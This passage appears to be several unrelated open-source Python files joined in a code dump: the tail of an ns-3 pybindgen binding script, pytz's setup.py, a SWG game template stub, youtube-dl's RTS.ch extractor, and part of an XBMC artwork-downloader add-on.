is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
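# A minimal usage sketch (the module filename is illustrative): pybindgen
# scripts like this write the generated C++ wrapper to stdout via
# FileCodeSink, so a typical invocation is
#   python ns3_module_config_store.py > ns3_module_config_store.cc
# and the emitted .cc file is then compiled into the Python extension.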
|
sanjeevtripurari/hue
|
refs/heads/master
|
desktop/core/ext-py/pytz-2015.2/setup.py
|
61
|
'''
pytz setup script
'''
import pytz, sys, os, os.path
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
me = 'Stuart Bishop'
memail = 'stuart@stuartbishop.net'
packages = ['pytz']
resources = ['zone.tab', 'locales/pytz.pot']
for dirpath, dirnames, filenames in os.walk(os.path.join('pytz', 'zoneinfo')):
# remove the 'pytz' part of the path
basepath = dirpath.split(os.path.sep, 1)[1]
resources.extend([os.path.join(basepath, filename)
for filename in filenames])
package_data = {'pytz': resources}
assert len(resources) > 10, 'zoneinfo files not found!'
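# A rough illustration (paths are examples) of what the walk above collects:
#   resources == ['zone.tab', 'locales/pytz.pot',
#                 'zoneinfo/UTC', 'zoneinfo/Europe/London', ...]
# so package_data maps the 'pytz' package onto every bundled zoneinfo file.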
setup(
name='pytz',
version=pytz.VERSION,
zip_safe=True,
description='World timezone definitions, modern and historical',
long_description=open('README.txt','r').read(),
author=me,
author_email=memail,
maintainer=me,
maintainer_email=memail,
url='http://pythonhosted.org/pytz',
license='MIT',
keywords=['timezone','tzinfo', 'datetime', 'olson', 'time'],
packages=packages,
package_data=package_data,
download_url='http://pypi.python.org/pypi/pytz',
platforms=['Independent'],
classifiers = [
'Development Status :: 6 - Mature',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/building/poi/shared_tatooine_burning_sandcrawler.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Building()
result.template = "object/building/poi/shared_tatooine_burning_sandcrawler.iff"
result.attribute_template_id = -1
result.stfName("poi_n","base_poi_building")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
Hakuba/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/rts.py
|
32
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .srgssr import SRGSSRIE
from ..compat import (
compat_str,
compat_urllib_parse_urlparse,
)
from ..utils import (
int_or_none,
parse_duration,
parse_iso8601,
unescapeHTML,
xpath_text,
)
class RTSIE(SRGSSRIE):
IE_DESC = 'RTS.ch'
_VALID_URL = r'rts:(?P<rts_id>\d+)|https?://(?:www\.)?rts\.ch/(?:[^/]+/){2,}(?P<id>[0-9]+)-(?P<display_id>.+?)\.html'
_TESTS = [
{
'url': 'http://www.rts.ch/archives/tv/divers/3449373-les-enfants-terribles.html',
'md5': 'f254c4b26fb1d3c183793d52bc40d3e7',
'info_dict': {
'id': '3449373',
'display_id': 'les-enfants-terribles',
'ext': 'mp4',
'duration': 1488,
'title': 'Les Enfants Terribles',
'description': 'France Pommier et sa soeur Luce Feral, les deux filles de ce groupe de 5.',
'uploader': 'Divers',
'upload_date': '19680921',
'timestamp': -40280400,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
}
},
{
'url': 'http://www.rts.ch/emissions/passe-moi-les-jumelles/5624067-entre-ciel-et-mer.html',
'md5': 'f1077ac5af686c76528dc8d7c5df29ba',
'info_dict': {
'id': '5742494',
'display_id': '5742494',
'ext': 'mp4',
'duration': 3720,
'title': 'Les yeux dans les cieux - Mon homard au Canada',
'description': 'md5:d22ee46f5cc5bac0912e5a0c6d44a9f7',
'uploader': 'Passe-moi les jumelles',
'upload_date': '20140404',
'timestamp': 1396635300,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
}
},
{
'url': 'http://www.rts.ch/video/sport/hockey/5745975-1-2-kloten-fribourg-5-2-second-but-pour-gotteron-par-kwiatowski.html',
'md5': 'b4326fecd3eb64a458ba73c73e91299d',
'info_dict': {
'id': '5745975',
'display_id': '1-2-kloten-fribourg-5-2-second-but-pour-gotteron-par-kwiatowski',
'ext': 'mp4',
'duration': 48,
'title': '1/2, Kloten - Fribourg (5-2): second but pour Gottéron par Kwiatowski',
'description': 'Hockey - Playoff',
'uploader': 'Hockey',
'upload_date': '20140403',
'timestamp': 1396556882,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'skip': 'Blocked outside Switzerland',
},
{
'url': 'http://www.rts.ch/video/info/journal-continu/5745356-londres-cachee-par-un-epais-smog.html',
'md5': '9f713382f15322181bb366cc8c3a4ff0',
'info_dict': {
'id': '5745356',
'display_id': 'londres-cachee-par-un-epais-smog',
'ext': 'mp4',
'duration': 33,
'title': 'Londres cachée par un épais smog',
'description': 'Un important voile de smog recouvre Londres depuis mercredi, provoqué par la pollution et du sable du Sahara.',
'uploader': 'Le Journal en continu',
'upload_date': '20140403',
'timestamp': 1396537322,
'thumbnail': 're:^https?://.*\.image',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
}
},
{
'url': 'http://www.rts.ch/audio/couleur3/programmes/la-belle-video-de-stephane-laurenceau/5706148-urban-hippie-de-damien-krisl-03-04-2014.html',
'md5': 'dd8ef6a22dff163d063e2a52bc8adcae',
'info_dict': {
'id': '5706148',
'display_id': 'urban-hippie-de-damien-krisl-03-04-2014',
'ext': 'mp3',
'duration': 123,
'title': '"Urban Hippie", de Damien Krisl',
'description': 'Des Hippies super glam.',
'upload_date': '20140403',
'timestamp': 1396551600,
},
},
{
# article with videos on rhs
'url': 'http://www.rts.ch/sport/hockey/6693917-hockey-davos-decroche-son-31e-titre-de-champion-de-suisse.html',
'info_dict': {
'id': '6693917',
'title': 'Hockey: Davos décroche son 31e titre de champion de Suisse',
},
'playlist_mincount': 5,
}
]
def _real_extract(self, url):
m = re.match(self._VALID_URL, url)
media_id = m.group('rts_id') or m.group('id')
display_id = m.group('display_id') or media_id
def download_json(internal_id):
return self._download_json(
'http://www.rts.ch/a/%s.html?f=json/article' % internal_id,
display_id)
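# Illustrative call (the id is an example): download_json('5742494') fetches
# http://www.rts.ch/a/5742494.html?f=json/article and returns the parsed
# article JSON used below.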
all_info = download_json(media_id)
# media_id extracted out of URL is not always a real id
if 'video' not in all_info and 'audio' not in all_info:
page = self._download_webpage(url, display_id)
# article with videos on rhs
videos = re.findall(
r'<article[^>]+class="content-item"[^>]*>\s*<a[^>]+data-video-urn="urn:([^"]+)"',
page)
if not videos:
videos = re.findall(
r'(?s)<iframe[^>]+class="srg-player"[^>]+src="[^"]+urn:([^"]+)"',
page)
if videos:
entries = [self.url_result('srgssr:%s' % video_urn, 'SRGSSR') for video_urn in videos]
return self.playlist_result(entries, media_id, self._og_search_title(page))
internal_id = self._html_search_regex(
r'<(?:video|audio) data-id="([0-9]+)"', page,
'internal video id')
all_info = download_json(internal_id)
media_type = 'video' if 'video' in all_info else 'audio'
# check for errors
self.get_media_data('rts', media_type, media_id)
info = all_info['video']['JSONinfo'] if 'video' in all_info else all_info['audio']
upload_timestamp = parse_iso8601(info.get('broadcast_date'))
duration = info.get('duration') or info.get('cutout') or info.get('cutduration')
if isinstance(duration, compat_str):
duration = parse_duration(duration)
view_count = info.get('plays')
thumbnail = unescapeHTML(info.get('preview_image_url'))
def extract_bitrate(url):
return int_or_none(self._search_regex(
r'-([0-9]+)k\.', url, 'bitrate', default=None))
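# Example (URL is illustrative): extract_bitrate('http://x/clip-700k.mp4')
# returns 700; it returns None when no '-<n>k.' marker is present.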
formats = []
for format_id, format_url in info['streams'].items():
if format_id == 'hds_sd' and 'hds' in info['streams']:
continue
if format_id == 'hls_sd' and 'hls' in info['streams']:
continue
if format_url.endswith('.f4m'):
token = self._download_xml(
'http://tp.srgssr.ch/token/akahd.xml?stream=%s/*' % compat_urllib_parse_urlparse(format_url).path,
media_id, 'Downloading %s token' % format_id)
auth_params = xpath_text(token, './/authparams', 'auth params')
if not auth_params:
continue
formats.extend(self._extract_f4m_formats(
'%s?%s&hdcore=3.4.0&plugin=aasp-3.4.0.132.66' % (format_url, auth_params),
media_id, f4m_id=format_id, fatal=False))
elif format_url.endswith('.m3u8'):
formats.extend(self._extract_m3u8_formats(
format_url, media_id, 'mp4', 'm3u8_native', m3u8_id=format_id, fatal=False))
else:
formats.append({
'format_id': format_id,
'url': format_url,
'tbr': extract_bitrate(format_url),
})
if 'media' in info:
formats.extend([{
'format_id': '%s-%sk' % (media['ext'], media['rate']),
'url': 'http://download-video.rts.ch/%s' % media['url'],
'tbr': media['rate'] or extract_bitrate(media['url']),
} for media in info['media'] if media.get('rate')])
self._check_formats(formats, media_id)
self._sort_formats(formats)
return {
'id': media_id,
'display_id': display_id,
'formats': formats,
'title': info['title'],
'description': info.get('intro'),
'duration': duration,
'view_count': view_count,
'uploader': info.get('programName'),
'timestamp': upload_timestamp,
'thumbnail': thumbnail,
}
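# A minimal sketch (not part of the extractor) of exercising RTSIE through
# youtube-dl's public API, using a URL from the test list above:
#   from youtube_dl import YoutubeDL
#   with YoutubeDL({'skip_download': True}) as ydl:
#       info = ydl.extract_info(
#           'http://www.rts.ch/archives/tv/divers/3449373-les-enfants-terribles.html')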
|
SMALLplayer/smallplayer-image-creator
|
refs/heads/master
|
storage/.xbmc/addons/script.artwork.downloader/default.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2013 Martijn Kaijser
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#import modules
import os
import sys
import xbmc
import xbmcaddon
import xbmcgui
import time
import lib.common
### get addon info
__addon__ = lib.common.__addon__
__addonname__ = lib.common.__addonname__
__addonpath__ = lib.common.__addonpath__
__addonprofile__ = lib.common.__addonprofile__
__localize__ = lib.common.__localize__
__version__ = lib.common.__version__
### import libraries
from lib import language
from lib import provider
from lib.apply_filters import filter
from lib.art_list import arttype_list
from lib.fileops import fileops, cleanup
from lib.gui import choose_image, dialog_msg, choice_type, gui_imagelist, hasimages
from lib.media_setup import _media_listing as media_listing
from lib.media_setup import _media_unique as media_unique
from lib.provider import tmdb # imported to search when there's no ID
from lib.provider.local import local
from lib.report import create_report
from lib.script_exceptions import *
from lib.settings import get_limit, get, check
from lib.utils import *
from traceback import print_exc
from urlparse import urlsplit
from xml.parsers.expat import ExpatError
arttype_list = arttype_list()
cancelled = False
download_arttypes = []
download_counter = {'Total Artwork': 0}
download_list = []
download_succes = False
failed_items = []
image_list = []
limit = get_limit()
reportdata = '[B]Artwork Downloader:[/B]'
setting = get()
startup = {'mediatype': False,
'dbid': False,
'mode': False,
'silent': False}
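# startup is filled from key=value pairs on sys.argv (see initialise below),
# so an illustrative invocation such as
#   RunScript(script.artwork.downloader, mode=gui, mediatype=movie, dbid=123)
# ends up setting startup['mode'], startup['mediatype'] and startup['dbid'].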
class Main:
def __init__(self):
if not check(): # Check if there are some faulty combinations present
sys.exit(1)
if self.initialise():
global setting
global startup
providers = provider.get_providers()
# Check for silent background mode
if startup['silent']:
setting['background'] = True
setting['notify'] = False
# Check for gui mode
elif startup['mode'] == 'gui':
setting['background'] = True
setting['notify'] = False
setting['files_overwrite'] = True
dialog_msg('create',
line1 = __localize__(32008),
background = setting['background'])
# Check if mediatype is specified
if startup['mediatype']:
# Check if dbid is specified
if startup['dbid']:
mediaList = media_unique(startup['mediatype'],startup['dbid'])
if startup['mediatype'] == 'movie':
self.download_artwork(mediaList, providers['movie_providers'])
elif startup['mediatype'] == 'tvshow':
self.download_artwork(mediaList, providers['tv_providers'])
elif startup['mediatype'] == 'musicvideo':
self.download_artwork(mediaList, providers['musicvideo_providers'])
if (not dialog_msg('iscanceled', background = setting['background']) and not
(startup['mode'] == 'customgui' or
startup['mode'] == 'gui')):
self._batch_download(download_list)
else:
# If no dbid specified
# 1. Check what media type was specified, 2. Retrieve library list, 3. Enable the correct type, 4. Do the API stuff
setting['movie_enable'] = False
setting['tvshow_enable'] = False
setting['musicvideo_enable'] = False
if startup['mediatype'] == 'movie':
setting['movie_enable'] = True
mediaList = media_listing('movie')
self.download_artwork(mediaList, providers['movie_providers'])
elif startup['mediatype'] == 'tvshow':
setting['tvshow_enable'] = True
mediaList = media_listing('tvshow')
self.download_artwork(mediaList, providers['tv_providers'])
elif startup['mediatype'] == 'musicvideo':
setting['musicvideo_enable'] = True
mediaList = media_listing('musicvideo')
self.download_artwork(mediaList, providers['musicvideo_providers'])
if not dialog_msg('iscanceled', background = setting['background']):
self._batch_download(download_list)
# No mediatype is specified
else:
# activate movie/tvshow/musicvideo for custom run
if startup['mode'] == 'custom':
setting['movie_enable'] = True
setting['tvshow_enable'] = True
setting['musicvideo_enable'] = True
# Normal operations check
# 1. Check if enable, 2. Get library list, 3. Set mediatype, 4. Do the API stuff
# Do this for each media type
if setting['movie_enable'] and not dialog_msg('iscanceled', background = True):
startup['mediatype'] = 'movie'
mediaList = media_listing(startup['mediatype'])
self.download_artwork(mediaList, providers['movie_providers'])
if setting['tvshow_enable'] and not dialog_msg('iscanceled', background = True):
startup['mediatype'] = 'tvshow'
mediaList = media_listing(startup['mediatype'])
self.download_artwork(mediaList, providers['tv_providers'])
if setting['musicvideo_enable'] and not dialog_msg('iscanceled', background = True):
startup['mediatype'] = 'musicvideo'
mediaList = media_listing(startup['mediatype'])
self.download_artwork(mediaList, providers['musicvideo_providers'])
# If not cancelled throw the whole downloadlist into the batch downloader
if not dialog_msg('iscanceled',
background = setting['background']):
self._batch_download(download_list)
else:
log('Initialisation error, script aborting', xbmc.LOGERROR)
# Make sure that the files_overwrite option gets reset after downloading
__addon__.setSetting(id='files_overwrite', value='false')
cleanup()
self.report()
### load settings and initialise needed directories
def initialise(self):
global startup
log('## Checking for downloading mode...')
args = ['silent', 'mode', 'mediatype', 'dbid']
for item in sys.argv:
arg = item.split('=')
if arg[0] in args:
startup.update({arg[0]: arg[1]})
if startup['mediatype'] and (startup['mediatype'] not in ['tvshow', 'movie', 'musicvideo']):
log('Error: invalid mediatype, must be one of movie, tvshow or musicvideo', xbmc.LOGERROR)
return False
elif startup['dbid'] == '':
dialog_msg('okdialog',
line1 = __localize__(32084))
log('Error: no valid dbid received, item must be scanned into library.', xbmc.LOGERROR)
return False
try:
# Creates temp folder
self.fileops = fileops()
except CreateDirectoryError, e:
log('Could not create directory: %s' % str(e))
return False
else:
return True
def report(self):
global setting
### log results and notify user
# Download totals to log and to download report
create_report(reportdata, download_counter, failed_items)
# Build dialog messages
summary = __localize__(32012) + ': %s ' % download_counter['Total Artwork'] + __localize__(32020)
summary_notify = ': %s ' % download_counter['Total Artwork'] + __localize__(32020)
provider_msg1 = __localize__(32001)
provider_msg2 = __localize__(32184) + ' | ' + __localize__(32185) + ' | ' + __localize__(32186)
# Close dialog in case it was open before doing a notification
time.sleep(2)
dialog_msg('close',
background = setting['background'])
# Some dialog checks
if setting['notify']:
log('Notify on finished/error enabled')
setting['background'] = False
if (xbmc.Player().isPlayingVideo() or startup['silent'] or
startup['mode'] in ['gui', 'customgui', 'custom']):
log('Silent finish because of playing a video or silent mode')
setting['background'] = True
if not setting['failcount'] < setting['failthreshold']:
log('Network error detected, script aborted', xbmc.LOGERROR)
dialog_msg('okdialog',
line1 = __localize__(32010),
line2 = __localize__(32011),
background = setting['background'])
if not xbmc.abortRequested:
# Show dialog/notification
if setting['background']:
dialog_msg('okdialog',
line0 = summary_notify,
line1 = provider_msg1 + ' ' + provider_msg2,
background = setting['background'],
cancelled = cancelled)
else:
# When 'no' is chosen in the yes/no dialog, execute viewer.py and pass 'downloadreport'
if dialog_msg('yesno',
line1 = summary,
line2 = provider_msg1,
line3 = provider_msg2,
background = setting['background'],
nolabel = __localize__(32027),
yeslabel = __localize__(32028)):
runcmd = os.path.join(__addonpath__, 'lib/viewer.py')
xbmc.executebuiltin('XBMC.RunScript (%s,%s) '%(runcmd, 'downloadreport'))
else:
dialog_msg('okdialog',
line1 = __localize__(32010),
line2 = summary,
background = setting['background'])
# Container refresh
if startup['mode'] in ['gui','customgui']:
if download_succes:
xbmc.executebuiltin('Container.Refresh')
#xbmc.executebuiltin('XBMC.ReloadSkin()')
### download media fanart
def download_artwork(self, media_list, providers):
global image_list
global reportdata
processeditems = 0
media_list_total = len(media_list)
for currentmedia in media_list:
image_list = []
# Declare some vars
if not currentmedia.get('disctype'):
currentmedia['disctype'] = 'n/a'
### check if XBMC is shutting down
if xbmc.abortRequested:
log('XBMC abort requested, aborting')
reportdata += ('\n - %s: %s' %(__localize__(32150), time.strftime('%d %B %Y - %H:%M')))
break
### check if script has been cancelled by user
if dialog_msg('iscanceled',
background = setting['background']):
reportdata += ('\n - %s [%s]: %s' %(__localize__(32151), currentmedia['mediatype'], time.strftime('%d %B %Y - %H:%M')))
break
# abort script because of too many failures
if not setting['failcount'] < setting['failthreshold']:
reportdata += ('\n - %s: %s' %(__localize__(32152), time.strftime('%d %B %Y - %H:%M')))
break
dialog_msg('update',
percentage = int(float(processeditems) / float(media_list_total) * 100.0),
line1 = currentmedia['name'],
line2 = __localize__(32008),
line3 = '',
background = setting['background'])
log('########################################################')
log('Processing media: %s' % currentmedia['name'])
# do some id conversions
if (not currentmedia['mediatype'] == 'tvshow' and
currentmedia['id'] in ['','tt0000000','0']):
log('No IMDB ID found, trying to search themoviedb.org for matching title.')
currentmedia['id'] = tmdb._search_movie(currentmedia['name'],currentmedia['year'])
elif (currentmedia['mediatype'] == 'movie' and not
currentmedia['id'] == '' and not
currentmedia['id'].startswith('tt')):
log('No valid ID found, trying to search themoviedb.org for matching title.')
currentmedia['id'] = tmdb._search_movie(currentmedia['name'],currentmedia['year'])
log('Provider ID: %s' % currentmedia['id'])
log('Media path: %s' % currentmedia['path'])
# Declare the target folders
artworkdir = []
extrafanartdirs = []
extrathumbsdirs = []
for item in currentmedia['path']:
artwork_dir = os.path.join(item + '/')
extrafanart_dir = os.path.join(artwork_dir + 'extrafanart' + '/')
extrathumbs_dir = os.path.join(artwork_dir + 'extrathumbs' + '/')
artworkdir.append(artwork_dir.replace('BDMV/','').replace('VIDEO_TS/',''))
extrafanartdirs.append(extrafanart_dir)
extrathumbsdirs.append(extrathumbs_dir)
# Check if using the centralize option
if setting['centralize_enable']:
if currentmedia['mediatype'] == 'tvshow':
extrafanartdirs.append(setting['centralfolder_tvshows'])
elif currentmedia['mediatype'] == 'movie':
extrafanartdirs.append(setting['centralfolder_movies'])
currentmedia['artworkdir'] = artworkdir
currentmedia['extrafanartdirs'] = extrafanartdirs
currentmedia['extrathumbsdirs'] = extrathumbsdirs
# This part checks for local files when enabled
scan_more = True
missing = False
if setting['files_local']:
local_list = []
local_list, scan_more, missing = local().get_image_list(currentmedia)
# append local artwork
for item in local_list:
image_list.append(item)
# Check for presence of id used by source sites
if (startup['mode'] == 'gui' and
((currentmedia['id'] == '') or
(currentmedia['mediatype'] == 'tvshow' and
currentmedia['id'].startswith('tt')))):
dialog_msg('close',
background = setting['background'])
dialog_msg('okdialog',
'',
currentmedia['name'],
__localize__(32030))
elif currentmedia['id'] == '':
log('- No ID found, skipping')
failed_items.append('[%s] ID %s' %(currentmedia['name'], __localize__(32022)))
elif currentmedia['mediatype'] == 'tvshow' and currentmedia['id'].startswith('tt'):
log('- IMDB ID found for TV show, skipping')
failed_items.append('[%s]: TVDB ID %s' %(currentmedia['name'], __localize__(32022)))
# Skip scanning for more if local files have been found and we're not running in gui/custom mode
elif not scan_more and not startup['mode'] in ['gui', 'custom']:
log('- Already have all files local')
pass
# If a correct ID was found and we don't already have all artwork, retrieve it from the providers
else:
log('- Still missing some files')
log(missing)
temp_image_list = []
# Run through all providers getting their imagelisting
failcount = 0
for self.provider in providers:
if not failcount < setting['failthreshold']:
break
artwork_result = ''
xmlfailcount = 0
